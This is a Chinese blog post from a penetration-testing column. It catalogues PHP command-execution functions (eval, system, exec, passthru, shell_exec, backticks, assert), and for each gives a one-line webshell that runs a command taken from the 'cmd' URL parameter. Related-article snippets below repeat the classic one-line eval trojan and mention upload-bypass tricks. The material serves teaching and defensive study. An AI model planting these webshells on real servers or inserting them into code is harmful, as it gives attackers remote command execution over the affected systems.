WebShell

最新推荐文章于 2024-08-22 09:44:18 发布
最新推荐文章于 2024-08-22 09:44:18 发布
阅读量76 收藏
点赞数
分类专栏: 网络安全-渗透篇 文章标签: php 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Massimo__JAVA/article/details/130379957
版权

1)eval()
将括号中的字符串变成代码执行,无返回值。

<?php
eval($_GET['cmd']);
?>

在这里插入图片描述
2)System(string command [, int return_var])
第一个参数为给定执行的命令;
第二个为可选参数,为命令执行后的状态码,0代表成功,1代表失败;
有返回值。

<?php
System($_GET['cmd'],$code);
echo "<br>";
echo $code;
?>

在这里插入图片描述
3)exec(string command [, string array [, int return_var]])
与system()类似,但不输出结果,而是返回结果的最后一行;
第一个参数为给定执行的命令;
第二个参数为可选参数,代表完整的返回结果,功能为把结果逐行追加到array的结尾处;
第三个参数为执行命令的状态码,0代表成功,1代表失败。

<?php
echo exec($_GET['cmd'],$array,$code);
echo "<br>";
print_r($array); //打印变量
echo "<br>";
echo "状态码: ".$code;
?>

在这里插入图片描述
4)passthru(string command [, int return_var])
该函数只调用命令,不返回任何结果,但会将结果原样直接输出到设备上;
第一个参数为给定执行的命令;
第二个参数为命令执行的状态码。

<?php
passthru($_GET['cmd'],$code);
echo "<br>";
echo "状态码为:".$code;
?>

在这里插入图片描述
5)shell_exec(String command)

<?php
echo shell_exec($_GET['cmd']);
?>

在这里插入图片描述
6)反撇号
与shell_exec功能相同,执行shell命令并返回输出的字符串,可以达到system()一样的效果

<?php
$test = $_GET['cmd'];
echo `$test`;
?>

在这里插入图片描述其实shell_exec就是反撇号的变体,实际上完全等于shell_exec,禁用这个函数就不行。

7)assert()
在这里插入图片描述

Massimo_ycw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webshell
prodigal11的博客
02-05 1066
Webshell实现与隐藏探究 一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
Webshell
heibaikong6的博客
08-25 5504
webshell webshell简介: webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、故武器管理等待一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服...
Webshell介绍
YIGAOYU的博客
10-07 2618
目录一. Webshell介绍1.1任务描述1.2 训练目标1.3 Webshell简介1.4 常见Webshell上传方式1.4.1 解析漏洞上传(1)IIS目录解析漏洞(2)文件解析漏洞(3)文件名解析(4)fast-CGI解析漏洞(5)Apache解析漏洞1.4.2 截断上传1.4.3 后台数据库备份1.4.4 利用数据库语句上传(1)MySQL数据库into outfile(2)建立新表写入木马(3)phpMyadmin设置错误1.5 Webshell的作用1.6 Webshel
webshell实践
qq_60680687的博客
08-14 294
原理:我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[’ ‘]、$_POST[’ ‘]、$_COOKIE[’ '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。话说做webshell检测的时候,因为要绕过HIDS,常规的一句话木马,大马都基本上会被拦截,不得不去找了一些php提供的”安全函数“(ps,这里我所指的“安全函数”是php的内置的回调函数,因为本身这些方法都是php自提供的,所以还是一定程度上可以绕过的)。
webshell及工具
heyingcheng的博客
05-10 2418
1,eval()函数把字符串按照php代码来计算;2,该字符串必须是合法的php代码,且必须以分号结尾;php中的echo的功能是把参数直接输出到页面上:php?给参数caidao赋值,然后输出到页面上:给caidao的值111输出到页面是111eval函数把字符串按照php代码进行解析,并且该字符串必须是合法的php代码。eval函数前面加上@符号可以不显示报错。php?eval函数的作用也是解析参数,我们在firefox随意传递一个参数试试:可以看到没有加@时我们会看到报错信息。
python webshell_使用 Python 批量爬取 WebShell
weixin_39786617的博客
12-12 762
使用 Python 批量爬取 WebShell还在用爬虫爬一些简单的数据?太没意思了!我们来用爬虫爬 WebShell!0. 引子前些天访问一个平时经常访问的网站,意外的发现这个站出了问题,首页变成了 phpStudy 探针 2014,大概是这样的:查看了一下之后发现,在这个探针的底部,有一个检测 MySQL 数据库连接检测的功能:可以使用这个功能,检测这台主机上的 MySQL 数据库的账号密码。...
webshell及木马详解
金色%夕阳的博客
04-24 5666
webshell简介 什么是webshell ,一句话木马是什么样的 <?php @eval($_POST[cmd]);?> 怎么对木马进行免杀(绕过) 异或变形,关键字拼接,加密,编码等方式 文件上传 文件上传有哪些可以利用的点 前端校验 js 禁用js 或者 burp抓包后改名将.jpg改为.php 后端校验MIME类型。 更改Content-Type为Content-Type: image/jpeg 文件后缀黑名单 寻找其他可解析后缀 利用.user.ini .htaccess 利用%
webshell检测方法归纳
计算机科研杂货铺
08-17 4037
背景 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell检测模型 Webshell的运行流程:hacker -> HTTP Protocol -> Web Server -> CGI。简单来看就是这样一个
WebShell简介
YJ_12340的博客
08-08 1626
• JSP类型• ASP类型• PHP类型。
wso_webshell_php_
10-01
Webshell,又称为Web后门,是一种通过Web服务端口植入的恶意脚本,允许攻击者远程控制被黑服务器。在描述中提到的"Webshell",暗示了这个压缩包可能包含了一系列不同版本的Webshell工具,具体来说,是WSO(Web Shell...
webshell反弹技术
01-05
webshell反弹技术
jsp的webshell.txt
04-07
根据提供的文件信息,本文将详细解析与“jsp的webshell.txt”相关的关键知识点,包括JSP WebShell的基本概念、工作原理、以及示例代码中的具体实现细节。 ### JSP WebShell基本概念 WebShell通常指的是攻击者利用...
Java、python、php版的高考志愿填报辅助系统(源码、调试、LW、开题、PPT)
m0_72599287的博客
08-19 1210
高考志愿填报辅助系统采用Java、python、php三种语言做了三个不同的版本,每个版本的页面央视、功能模块都一样,具体如文中展示。
推荐一个完全自由的目录设计网站
最新发布
qq_30049249的博客
08-22 401
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
day32(8/20)——playbook剧本安装nginx、roles
wh992610的博客
08-21 844
roles(⻆⾊): 就是通过分别将variables, tasks及handlers等放置于单独的⽬录中,并可以便捷地调⽤它们的⼀种机制。假设我们要写⼀个playbook来安装管理lamp环境,那么这个playbook就会写很⻓。所以我们希望把这个很⼤的⽂件分成多个功能拆分, 分成apache管理,php管理,mysql管理,然后在需要使⽤的时候直接调⽤就可以了,以免重复写。就类似编程⾥的模块化的概念,以达到代码复⽤的效果。
thinkphp5漏洞分析之文件包含
m0_68976043的博客
08-20 651
最后,再通过一张攻击流程图来回顾整个攻击过程。
webshell原理
06-14
Webshell是一种恶意软件,通常被黑客用于远程控制Web服务器上的系统。它通过在服务器上植入一个脚本或程序,允许攻击者像操作本地计算机一样执行命令。Webshell的工作原理主要包括以下几个步骤: 1. **植入阶段**:黑客利用漏洞(如SQL注入、文件上传或跨站脚本攻击)将Webshell代码插入到网站的服务器文件中,这些文件通常是.php、.asp、.jsp等常见的Web脚本。 2. **隐藏性**:为了躲避安全检测,Webshell会被编码、加密或嵌入到正常文件中,或者使用不可见的文件扩展名(如.htaccess)和特殊目录。 3. **权限获取**:一旦Webshell被植入,攻击者需要获取执行Webshell所需的权限,这可能依赖于先前的漏洞利用或者服务器配置。 4. **通信通道**:Webshell通常会建立一个与黑客的隐藏通信通道,例如通过HTTP GET/POST请求、隐藏iframe、WebSockets或HTTPS隧道。 5. **执行命令**:攻击者通过访问包含Webshell的URL或者发送特定的数据给这个URL,可以执行预设的命令,查看、修改服务器文件,甚至获取敏感信息。 6. **清理痕迹**:为了防止被发现,黑客可能会定期更改Webshell的位置、名称或者删除它。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值